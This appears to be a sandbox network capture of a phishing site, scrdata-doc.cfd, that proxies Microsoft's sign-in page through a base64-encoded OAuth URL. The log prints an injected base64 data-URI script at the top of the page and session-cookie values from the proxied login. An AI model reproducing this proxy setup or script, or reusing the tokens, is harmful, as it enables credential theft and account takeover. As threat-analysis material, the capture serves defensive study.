2024-04-26 11:21:11 UTC	15041	IN	Data Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 Data Ascii: /! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
2024-04-26 11:21:11 UTC	16384	IN	Data Raw: 70 61 6e 22 29 3b 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 22 72 65 64 22 2c 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3d 22 62 6c 75 65 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 6e 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 3b 45 3d 6e 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 3d 3d 6e 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 72 65 74 75 72 6e 20 45 7d 2c 67 Data Ascii: pan");e.style.borderLeftColor="red",e.style.borderRightColor="blue",e.style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var n=_.getComputedStyle(e);E=n.borderLeftColor===n.borderRightColor,document.body.removeChild(e)}return E},g
2024-04-26 11:21:11 UTC	16384	IN	Data Raw: 54 69 6d 65 64 4f 75 74 3a 31 30 32 39 2c 53 65 6e 64 4e 6f 74 69 66 69 63 61 74 69 6f 6e 46 61 69 6c 65 64 3a 31 30 33 30 2c 53 65 72 76 65 72 5f 4d 65 73 73 61 67 65 4f 6e 6c 79 3a 39 39 39 39 2c 50 50 5f 45 5f 44 42 5f 4d 45 4d 42 45 52 44 4f 45 53 4e 4f 54 45 58 49 53 54 3a 22 43 46 46 46 46 43 31 35 22 2c 50 50 5f 45 5f 45 58 43 4c 55 44 45 44 3a 22 38 30 30 34 31 30 31 30 22 2c 50 50 5f 45 5f 4d 45 4d 42 45 52 5f 4c 4f 43 4b 45 44 3a 22 38 30 30 34 31 30 31 31 22 2c 50 50 5f 45 5f 42 41 44 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 31 32 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 4d 45 4d 42 45 52 4e 41 4d 45 3a 22 38 30 30 34 31 30 33 31 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 33 32 22 Data Ascii: TimedOut:1029,SendNotificationFailed:1030,Server_MessageOnly:9999,PP_E_DB_MEMBERDOESNOTEXIST:"CFFFFC15",PP_E_EXCLUDED:"80041010",PP_E_MEMBER_LOCKED:"80041011",PP_E_BAD_PASSWORD:"80041012",PP_E_MISSING_MEMBERNAME:"80041031",PP_E_MISSING_PASSWORD:"80041032"
2024-04-26 11:21:11 UTC	16384	IN	Data Raw: 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 6e 2c 74 2c 72 29 7b 76 61 72 20 6f 3d 65 5b 6e 5d 2e 6d 61 74 63 68 28 62 29 7c 7c 5b 5d 3b 53 2e 61 2e 44 28 74 2e 6d 61 74 63 68 28 62 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 61 2e 4e 61 28 6f 2c 65 2c 72 29 7d 29 29 2c 65 5b 6e 5d 3d 6f 2e 6a 6f 69 6e 28 22 20 22 29 7d 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 69 3d 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 2c 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2c 70 3d 7b 7d 2c 68 3d 7b 7d 3b 70 5b 63 26 26 2f 46 69 72 65 66 6f 78 5c 2f 32 2f 69 2e 74 65 Data Ascii: e.__proto__=n,e}function r(e,n,t,r){var o=e[n].match(b)\|\|[];S.a.D(t.match(b),(function(e){S.a.Na(o,e,r)})),e[n]=o.join(" ")}var o=Object.prototype.hasOwnProperty,i={__proto__:[]}instanceof Array,f="function"==typeof Symbol,p={},h={};p[c&&/Firefox\/2/i.te
2024-04-26 11:21:11 UTC	16384	IN	Data Raw: 69 66 28 74 29 7b 69 66 28 21 53 2e 51 63 28 65 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 6e 6c 79 20 73 75 62 73 63 72 69 62 61 62 6c 65 20 74 68 69 6e 67 73 20 63 61 6e 20 61 63 74 20 61 73 20 64 65 70 65 6e 64 65 6e 63 69 65 73 22 29 3b 74 2e 6f 64 2e 63 61 6c 6c 28 74 2e 70 64 2c 65 2c 65 2e 66 64 7c 7c 28 65 2e 66 64 3d 2b 2b 6f 29 29 7d 7d 2c 47 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2c 74 2e 61 70 70 6c 79 28 72 2c 6f 7c 7c 5b 5d 29 7d 66 69 6e 61 6c 6c 79 7b 6e 28 29 7d 7d 2c 71 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 6f 2e 71 61 28 29 7d 2c 56 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 6f 2e 56 61 28 29 7d 2c Data Ascii: if(t){if(!S.Qc(e))throw Error("Only subscribable things can act as dependencies");t.od.call(t.pd,e,e.fd\|\|(e.fd=++o))}},G:function(t,r,o){try{return e(),t.apply(r,o\|\|[])}finally{n()}},qa:function(){if(t)return t.o.qa()},Va:function(){if(t)return t.o.Va()},
2024-04-26 11:21:11 UTC	16384	IN	Data Raw: 74 42 69 6e 64 69 6e 67 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 54 79 70 65 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 69 6e 64 22 29 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 20 53 2e 68 2e 56 64 28 65 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 70 61 72 73 65 42 69 6e 64 69 6e 67 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 72 29 7b 74 72 79 7b 76 61 72 20 6f 2c 69 3d 74 68 69 73 2e 6e 64 2c 61 3d 65 2b 28 72 26 26 72 2e 76 61 6c 75 65 41 63 63 65 73 73 6f 72 73 7c 7c 22 22 29 3b 69 66 28 21 28 6f 3d 69 5b 61 5d 29 29 7b 76 61 72 20 73 2c 75 3d 22 77 69 74 68 28 24 63 6f 6e Data Ascii: tBindingsString:function(e){switch(e.nodeType){case 1:return e.getAttribute("data-bind");case 8:return S.h.Vd(e);default:return null}},parseBindingsString:function(e,n,t,r){try{var o,i=this.nd,a=e+(r&&r.valueAccessors\|\|"");if(!(o=i[a])){var s,u="with($con
2024-04-26 11:21:12 UTC	16384	IN	Data Raw: 61 72 20 72 3d 74 79 70 65 6f 66 20 6e 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 72 3f 6e 28 65 29 3a 22 73 74 72 69 6e 67 22 3d 3d 72 3f 65 5b 6e 5d 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 74 29 7b 69 66 28 68 26 26 6c 29 53 2e 69 2e 6d 61 28 65 2c 53 2e 69 2e 48 29 3b 65 6c 73 65 20 69 66 28 70 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 72 3d 30 3c 3d 53 2e 61 2e 41 28 70 2c 53 2e 77 2e 4d 28 74 5b 30 5d 29 29 3b 53 2e 61 2e 5a 63 28 74 5b 30 5d 2c 72 29 2c 68 26 26 21 72 26 26 53 2e 75 2e 47 28 53 2e 61 2e 46 62 2c 6e 75 6c 6c 2c 5b 65 2c 22 63 68 61 6e 67 65 22 5d 29 7d 7d 76 61 72 20 73 3d 65 2e 6d 75 6c 74 69 70 6c 65 2c 75 3d 30 21 3d 65 2e 6c 65 6e 67 74 68 26 26 73 3f 65 2e 73 63 72 6f 6c 6c 54 6f 70 3a 6e 75 6c 6c 2c 63 3d 53 Data Ascii: ar r=typeof n;return"function"==r?n(e):"string"==r?e[n]:t}function i(n,t){if(h&&l)S.i.ma(e,S.i.H);else if(p.length){var r=0<=S.a.A(p,S.w.M(t[0]));S.a.Zc(t[0],r),h&&!r&&S.u.G(S.a.Fb,null,[e,"change"])}}var s=e.multiple,u=0!=e.length&&s?e.scrollTop:null,c=S
2024-04-26 11:21:13 UTC	16384	IN	Data Raw: 7b 69 66 28 30 3c 3d 6c 2e 74 6d 70 6c 2e 74 61 67 2e 74 6d 70 6c 2e 6f 70 65 6e 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5f 5f 22 29 29 72 65 74 75 72 6e 20 32 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 31 7d 28 29 3b 74 68 69 73 2e 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 53 6f 75 72 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 6f 29 7b 69 66 28 6f 3d 6f 7c 7c 75 2c 72 3d 72 7c 7c 7b 7d 2c 32 3e 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 59 6f 75 72 20 76 65 72 73 69 6f 6e 20 6f 66 20 6a 51 75 65 72 79 2e 74 6d 70 6c 20 69 73 20 74 6f 6f 20 6f 6c 64 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64 65 20 74 6f 20 6a 51 75 65 72 79 2e 74 6d 70 6c 20 31 2e 30 2e 30 70 72 65 20 6f 72 20 6c 61 74 65 72 2e 22 29 3b 76 Data Ascii: {if(0<=l.tmpl.tag.tmpl.open.toString().indexOf("__"))return 2}catch(e){}return 1}();this.renderTemplateSource=function(n,t,r,o){if(o=o\|\|u,r=r\|\|{},2>e)throw Error("Your version of jQuery.tmpl is too old. Please upgrade to jQuery.tmpl 1.0.0pre or later.");v
2024-04-26 11:21:13 UTC	11592	IN	Data Raw: 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 33 29 2c 6f 3d 74 28 32 31 29 2c 69 3d 74 28 37 29 2c 61 3d 74 28 30 29 2c 73 3d 74 28 31 29 2c 75 3d 74 28 39 29 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 77 69 6e 64 6f 77 2e 53 65 72 76 65 72 44 61 74 61 29 2c 63 3d 74 28 35 29 2c 6c 3d 77 69 6e 64 6f 77 2c 64 3d 6c 2e 24 43 6f 6e 66 69 67 7c 7c 6c 2e 53 65 72 76 65 72 44 61 74 61 7c 7c 7b 7d 2c 66 3d 61 2e 4f 62 6a 65 63 74 2c 70 3d 73 2e 51 75 65 72 79 53 74 72 69 6e 67 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 74 3d 21 31 21 3d 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 63 68 65 63 6b 41 70 69 43 61 6e 61 72 79 2c 61 3d 65 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 7c 7c 21 31 2c 73 3d 65 2e 62 72 Data Ascii: n(e,n,t){var r=t(3),o=t(21),i=t(7),a=t(0),s=t(1),u=t(9).getInstance(window.ServerData),c=t(5),l=window,d=l.$Config\|\|l.ServerData\|\|{},f=a.Object,p=s.QueryString;e.exports=function(e){var n=this,t=!1!==(e=e\|\|{}).checkApiCanary,a=e.withCredentials\|\|!1,s=e.br

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:13 UTC	3215	OUT	GET /?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; fpc=Ag3Kly0IoDdBkfMWaLarS2Y; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8Xa7tZ0SebpglM2T8wNj5qUiHXjDE8kzM4NSdE_IayLKIOQysDS2PA0gFadcG7C3F1Qb3Eis8Pzxbib5e2WtQ3OZsx1z-KmUvU6tXhDK42bF_XJGHSCB1p5OkGE6LzNjDbDp2uPiv6jJklS2Sjw6D_XWGoS0Wt5YsbwzflEZRlQkgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2024-04-26 11:21:14 UTC	2443	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 4dba0eb5-f220-4306-880f-eed097d26d01 x-ms-ests-server: 2.1.17846.6 - SEC ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; expires=Sun, 26-May-2024 11:21:14 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; domain=r6duftx9uh6.scrdata-doc.cfd; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; domain=r6duftx9uh6.scrdata-doc.cfd; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; expires=Sun, 26-May-2024 11:21:14 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Fri, 26 Apr 2024 11:21:13 GMT Connection: close content-length: 39093 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:14 UTC	13941	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xd
2024-04-26 11:21:14 UTC	16384	IN	Data Raw: 69 44 38 45 4e 30 33 56 62 54 6a 77 55 49 68 32 33 51 55 67 39 53 41 7a 44 77 72 5f 4e 45 4e 6c 55 51 2d 38 41 47 41 46 77 42 4d 42 77 51 6f 71 45 6f 30 4a 4d 51 68 4b 4b 52 42 45 53 4a 52 67 57 67 6d 6f 34 41 6d 4d 38 67 68 77 55 44 63 77 4a 57 69 7a 47 78 51 78 42 35 36 4b 71 5a 71 42 71 47 49 5a 46 46 52 31 4f 7a 4f 54 6c 6a 6d 75 69 4d 5a 47 32 31 64 50 50 4a 6e 77 47 61 64 75 56 46 6e 48 63 41 62 32 65 78 49 36 55 49 76 4a 36 55 6b 34 6b 2d 48 78 31 4b 39 73 70 4a 72 4d 59 4c 39 33 62 51 41 33 59 4d 31 4c 61 4d 68 5a 62 57 69 6d 7a 72 42 66 56 55 72 55 6c 57 6b 71 39 46 53 74 6e 79 71 6c 55 49 79 38 4b 34 6e 32 6c 6d 4e 45 36 64 63 56 4f 56 36 31 53 51 74 41 4b 71 32 75 34 74 68 4c 42 57 49 49 5a 76 52 64 31 43 6d 6a 70 44 6d 65 5a 31 70 44 2d 72 38 Data Ascii: iD8EN03VbTjwUIh23QUg9SAzDwr_NENlUQ-8AGAFwBMBwQoqEo0JMQhKKRBESJRgWgmo4AmM8ghwUDcwJWizGxQxB56KqZqBqGIZFFR1OzOTljmuiMZG21dPPJnwGaduVFnHcAb2exI6UIvJ6Uk4k-Hx1K9spJrMYL93bQA3YM1LaMhZbWimzrBfVUrUlWkq9FStnyqlUIy8K4n2lmNE6dcVOV61SQtAKq2u4thLBWIIZvRd1CmjpDmeZ1pD-r8
2024-04-26 11:21:14 UTC	8768	IN	Data Raw: 65 72 5d 3a 20 4c 6f 61 64 69 6e 67 20 27 22 2b 28 61 2e 73 72 63 50 61 74 68 7c 7c 22 22 29 2b 22 27 2c 20 69 64 3a 22 2b 28 61 2e 69 64 7c 7c 22 22 29 29 7d 65 6c 73 65 7b 6f 26 26 6f 28 29 7d 7d 76 61 72 20 70 3d 65 28 29 2c 79 3d 70 2e 73 6c 4d 61 78 52 65 74 72 79 7c 7c 32 2c 6d 3d 70 2e 6c 6f 61 64 65 72 7c 7c 7b 7d 2c 62 3d 6d 2e 63 64 6e 52 6f 6f 74 73 7c 7c 5b 5d 2c 24 3d 6d 2e 74 65 6e 61 6e 74 42 72 61 6e 64 69 6e 67 43 64 6e 52 6f 6f 74 73 7c 7c 5b 5d 2c 77 3d 74 68 69 73 2c 45 3d 5b 5d 3b 77 2e 72 65 74 72 79 4f 6e 45 72 72 6f 72 3d 21 30 2c 77 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 4c 6f 61 64 65 64 22 2c 77 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 45 72 72 6f 72 22 2c 77 2e 41 64 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 Data Ascii: er]: Loading '"+(a.srcPath\|\|"")+"', id:"+(a.id\|\|""))}else{o&&o()}}var p=e(),y=p.slMaxRetry\|\|2,m=p.loader\|\|{},b=m.cdnRoots\|\|[],$=m.tenantBrandingCdnRoots\|\|[],w=this,E=[];w.retryOnError=!0,w.successMessage="Loaded",w.failMessage="Error",w.Add=function(e,r,t

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:16 UTC	2755	OUT	GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0Nt